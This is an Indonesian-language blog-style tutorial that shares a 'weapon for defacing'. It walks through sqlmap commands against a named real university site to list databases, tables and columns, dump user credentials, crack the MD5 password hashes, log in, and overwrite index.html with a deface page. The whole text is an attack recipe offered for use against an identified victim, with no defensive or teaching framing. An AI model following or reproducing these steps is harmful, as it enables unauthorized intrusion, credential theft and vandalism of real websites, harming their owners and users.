Yoyo kali ini saya mau berbagi senjata buat deface kesayang saya nih wek wek langsung aja ke TKP
Bahan :
1. Python ( Download )
2. Sqlmap ( Download )
3. Html Script Deface ( Silahkan Cari Di Mbah Google Yaa )
Tekniknya :
- Setelah semua didownload install Python, lalu extract Sqlmap ke C:.
- Buka Cmd lalu ketik cd\sqlmap\ ( Enter )
- Cari target yang lemah saya contoh disini webnya wWw.du.ac.in/index.php?id=4, nah yang berwarna merah itu adalah sql yang lemah atau bisa dibilang DORK
- Ketik di CMD ( sqlmap.py - u www.du.ac.in/index.php?id=4 --dbs ) ( Enter )
- Nah jika muncul tabel silahkan buka tabelnya dengan menuliskan di CMD
- ( sqlmap.py - u www.du.ac.in/index.php?id=4 -D nama_tabel --tables )
- Nah jika ditables ada keluar columns silahkan ketikCMD
- ( sqlmap.py - u www.du.ac.in/index.php?id=4 -D nama_tables -T nama_user --columns )
- Nah jika muncul nama user sekarang ketik di CMD
- ( sqlmap.py - u www.du.ac.in/index.php?id=4 -D nama_tables -T nama_user --dump )
- Nah tunggu hingga selesai proses scan selesai nanti password akan muncul dalam bentuk MD5 lalu tinggal kita konvert
- Lalu login ke websitenya dan cari index.html lalu ganti dengan script deface sobat ingat tetap harus menggunakan index.html yaa
Maaf ga bisa kasi screenshot soalnya ribet hehehe